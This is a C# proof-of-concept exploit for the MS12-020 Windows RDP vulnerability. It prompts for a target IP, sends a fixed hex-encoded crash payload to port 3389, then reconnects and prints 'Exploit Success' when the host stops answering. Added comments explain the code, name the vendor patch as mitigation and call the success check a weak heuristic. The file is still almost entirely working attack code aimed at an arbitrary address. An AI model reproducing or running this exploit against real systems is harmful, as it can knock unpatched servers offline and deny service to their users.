//ms12-020 "chinese shit" PoC
//Tested On Win7 Ultimate & Win 2008 Server & Win 2003 Server R2
//C# Coded By Yomi :D
using System;
using System.Net;
using System.Net.Sockets;

namespace RDP_PoC_Exploit
{
    /// <summary>
    /// Console proof-of-concept for the RDP issue named in the header comment (ms12-020).
    /// It opens one TCP connection to port 3389 on an operator-supplied address, writes a fixed
    /// hex-encoded byte string to it, then attempts a second connection and reports the outcome
    /// purely from whether that second connect raises a <see cref="SocketException"/>.
    /// </summary>
    /// <remarks>
    /// Defender notes: the relevant mitigation is the vendor update referenced by the header
    /// (ms12-020) together with not exposing 3389 to untrusted networks. The program's
    /// "success"/"failed" verdict is a heuristic (see <see cref="Exploit_it"/>), not a
    /// confirmation of anything on the remote host.
    /// </remarks>
    class Program
    {
        // Fixed, hex-encoded byte sequence sent verbatim by Exploit_it after decoding with
        // HexString2Bytes. Despite the name this is a static string, not shellcode assembled at
        // runtime. The leading bytes (03 00 ..., 0e e0 ...) look like a TPKT-framed X.224/RDP
        // connection sequence, but the structure is not decoded or verified anywhere in this file.
        public static readonly string str_shell = "030000130ee00000" + "0000000100080000" + "000000030001d602" + "f0807f6582019404" + "01010401010101ff" + "3019020400000000"
            + "0204000000020204" + "0000000002040000" + "0001020400000000" + "0204000000010202" + "ffff020400000002" + "3019020400000001"
            + "0204000000010204" + "0000000102040000" + "0001020400000000" + "0204000000010202" + "0420020400000002" + "301c0202ffff0202"
            + "fc170202ffff0204" + "0000000102040000" + "0000020400000001" + "0202ffff02040000" + "0002048201330005" + "00147c0001812a00"
            + "0800100001c00044" + "756361811c01c0d8" + "00040008008002e0" + "0101ca03aa090400" + "00ce0e000048004f" + "0053005400000000"
            + "0000000000000000" + "0000000000000000" + "0000000000040000" + "00000000000c0000" + "0000000000000000" + "0000000000000000"
            + "0000000000000000" + "0000000000000000" + "0000000000000000" + "0000000000000000" + "0000000000000000" + "0000000000000000"
            + "0001ca0100000000" + "0010000700010030" + "0030003000300030" + "002d003000300030" + "002d003000300030" + "0030003000300030"
            + "002d003000300030" + "0030003000000000" + "0000000000000000" + "0000000000000000" + "000000000004c00c" + "000d000000000000"
            + "0002c00c001b0000" + "000000000003c02c" + "0003000000726470" + "6472000000000080" + "80636c6970726472" + "000000a0c0726470"
            + "736e640000000000" + "c00300000c02f080" + "0401000100030000" + "0802f08028030000" + "0c02f08038000603" + "ef0300000c02f080"
            + "38000603eb030000" + "0c02f08038000603" + "ec0300000c02f080" + "38000603ed030000" + "0c02f08038000603" + "ee0300000b06d000"
            + "00123400";

        /// <summary>
        /// Entry point: prompts for a remote IP on stdin and hands it straight to <see cref="Exploit_it"/>.
        /// </summary>
        /// <param name="args">Unused; the address is read interactively, not from the command line.</param>
        /// <remarks>
        /// No validation is done here. A non-IP string (or EOF, which makes ReadLine return null)
        /// reaches IPAddress.Parse inside Exploit_it, which throws FormatException/ArgumentNullException;
        /// those are not SocketException and are therefore not caught by Exploit_it, so the process
        /// terminates with an unhandled exception.
        /// </remarks>
        static void Main(string[] args)
        {
            Console.WriteLine("Enter Remote IP : <192.168.1.1> <Enter To Start :D>");
            string str_IP = Console.ReadLine();
            Exploit_it(str_IP);
        }

        /// <summary>
        /// Connects to <paramref name="IP"/> on TCP port 3389, sends the decoded <see cref="str_shell"/>
        /// bytes, disconnects, then probes with a second connection and prints a verdict based only on
        /// whether that second connect succeeds.
        /// </summary>
        /// <param name="IP">Dotted IPv4/IPv6 literal; parsed with IPAddress.Parse (no DNS resolution).</param>
        /// <remarks>
        /// Only <see cref="SocketException"/> is caught at either level. FormatException from
        /// IPAddress.Parse, or FormatException/Exception from HexString2Bytes, propagate to the caller.
        /// Neither socket is ever closed or disposed; both are left to the finalizer.
        /// </remarks>
        static private void Exploit_it(string IP)
        {
            try
            {
                // SocketType.Stream with ProtocolType.IP (rather than Tcp) — left as written.
                Socket _soc = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP);
                IPAddress remoteIPAddress = IPAddress.Parse(IP);
                IPEndPoint remoteEndPoint = new IPEndPoint(remoteIPAddress, 3389); // 3389 = default RDP port
                _soc.Connect(remoteEndPoint);
                Console.WriteLine(".............. Creating Paylod ");
                byte[] buff = HexString2Bytes(str_shell);
                Console.WriteLine(".............. Sending Payload ");
                // Single blocking Send; the return value (bytes actually queued) is not checked.
                _soc.Send(buff);
                Console.WriteLine(".............. Payoad Sent ! ");
                Console.WriteLine(".............. Reconnecting To Remote Target ! ");
                // reuseSocket=true, but _soc is never reused or closed afterwards.
                _soc.Disconnect(true);
                try
                {
                    // Second connection is the only "result" check: a successful connect is reported
                    // as failure, any SocketException as success. This is a weak heuristic — a
                    // SocketException here can equally come from a firewall, a transient network
                    // error, or connection rate-limiting on the remote side, so the printed verdict
                    // is not evidence that the remote service actually stopped.
                    Socket re_soc = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP);
                    IPAddress re_remoteIPAddress = IPAddress.Parse(IP); // unused: the endpoint below reuses remoteIPAddress (same value)
                    IPEndPoint re_remoteEndPoint = new IPEndPoint(remoteIPAddress, 3389);
                    re_soc.Connect(re_remoteEndPoint);
                    Console.WriteLine(".............. Remote Host Responding ! :( ");
                    Console.WriteLine(".............. Exploit Faild ! :( ");
                }
                catch (System.Net.Sockets.SocketException Exp)
                {
                    Console.WriteLine(".............. Remote Host Not Response ! :D");
                    Console.WriteLine(".............. Exploit Success !! \r\nSocket Error : [ " + Exp.Message + " ]");
                }
                Console.WriteLine(".............. Exploit Done ! \r\n.............. Check Result Of It !");
            }
            catch (System.Net.Sockets.SocketException se)
            {
                // Reached when the first Connect/Send fails (host unreachable, port closed, etc.).
                Console.WriteLine(".............. Exploit Faild !");
                Console.WriteLine("Socket Error : [ " + se.Message + " ]");
            }
        }

        /// <summary>
        /// Decodes a hex string (two characters per byte, no separators or 0x prefix) into a byte array.
        /// </summary>
        /// <param name="hexString">Even-length string of hex digits. Case-insensitive (NumberStyles.HexNumber).</param>
        /// <returns>A new array of length hexString.Length / 2; empty array for an empty string.</returns>
        /// <exception cref="Exception">Thrown (as the base type) when the length is odd.</exception>
        /// <remarks>
        /// A null argument fails on hexString.Length with NullReferenceException, and any non-hex
        /// character surfaces as FormatException from Int32.Parse. Neither is caught by Exploit_it.
        /// </remarks>
        static private byte[] HexString2Bytes(string hexString)
        {
            int len = hexString.Length;
            if (len % 2 == 1)
                throw new Exception("Invalid HEX String Length !");
            int len_half = len / 2;
            byte[] arr_b = new byte[len_half];
            for (int i = 0; i != len_half; i++)
            {
                // Each 2-char slice is parsed as a hex int and narrowed to a byte (max "ff" = 255, so no truncation).
                arr_b[i] = (byte)Int32.Parse(hexString.Substring(i * 2, 2), System.Globalization.NumberStyles.HexNumber);
            }
            return arr_b;
        }
    }
}